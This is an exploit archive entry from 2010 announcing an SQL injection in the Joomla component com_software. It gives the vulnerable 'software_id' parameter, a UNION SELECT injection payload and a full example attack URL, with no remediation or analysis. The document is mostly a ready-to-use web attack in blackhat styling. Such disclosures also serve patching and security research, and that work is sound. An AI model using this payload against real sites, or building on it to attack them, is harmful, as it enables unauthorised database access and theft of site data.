id: 11431
date: 03/24/2010
title: Joomla Component com_software SQL Injection Vulnerability
author: DevilZ TM
cves: 

=========================================================
Joomla Component com_software SQL Injection Vulnerability
=========================================================


# Title : Joomla Component com_software SQL Injection Vulnerability
# Author: DevilZ TM
# Data  : 2010-03-24
 
[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_software SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : Expl0it@DevilZTM.Com
[~] Contact   : D3v1l.blackhat@yahoo.com
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_software&task=viewDetail&software_id=[SQL]
 
[~] ExploiT         :
 
-1+UNION+SELECT+1--
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_software&task=viewDetail&software_id=-1+UNION+SELECT+1--



#  0day.today [2023-03-25]  #